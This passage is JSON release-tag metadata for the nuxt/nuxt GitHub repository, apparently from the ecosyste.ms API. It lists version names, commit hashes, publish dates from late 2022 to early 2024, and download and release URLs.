3e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.